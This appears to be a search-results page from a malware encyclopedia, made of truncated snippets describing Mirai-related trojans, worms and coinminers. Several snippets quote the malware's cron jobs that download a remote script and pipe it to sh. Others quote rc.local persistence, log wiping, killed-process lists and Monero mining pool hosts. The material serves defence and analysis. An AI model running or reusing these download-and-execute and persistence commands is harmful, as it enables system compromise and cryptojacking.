Search
Keyword: usojan.sh.mirai.boi
/tmp/.vd/sslm.tgz min* {Current Directory}/min* /tmp/min* Process Termination This Trojan terminates the following processes if found running in the affected system's memory: rand rx rd tsm tsm2 haiduc a sparky sh
Modifications This Trojan modifies the following file(s): /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot /var/spool/mail/{user} - contents replaced with "0" string /var/log/wtmp -
}/config.json It creates the following cron job to enable automatic execution of update.sh: Path: '/var/spool/cron/crontabs/'"$USER" Schedule: Every 30 minutes Command: */30 * * * * sh {directory}/update.sh
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
Telnet connections on the following ports: 23 2323 It creates the following cronjob to download and execute 2.sh every 1 hour: * 1 * * * $LDR http://{BLOCKED}.{BLOCKED}.39.78/2.sh | sh > /dev/null
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
}i.xyz:43768/init.sh | sh > /dev/null 2>&1 Downloaded from the Internet, Dropped by other malware Creates root cronjob, Downloads files
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Coinminer arrives on a system as
\shell HKEY_CURRENT_USER\a01\shell\ open HKEY_CURRENT_USER\a01\shell\ open\command HKEY_CURRENT_USER\a01\shell\ runas HKEY_CURRENT_USER\a01\shell\ runas\command HKEY_CURRENT_USER\SH HKEY_CURRENT_USER\SH
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
/var/spool/cron/root Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh mine.moneropool.com xmr.crypto-pool.fr monerohash.com xmrpool.eu pool.noobxmr.com pool.minexmr.cn xmr.poolto.be
This Trojan deletes itself after execution. Arrival Details This malware arrives via the following means: Downloaded by Trojan.SH.BROOTKIT.A Installation This Trojan adds the following folders: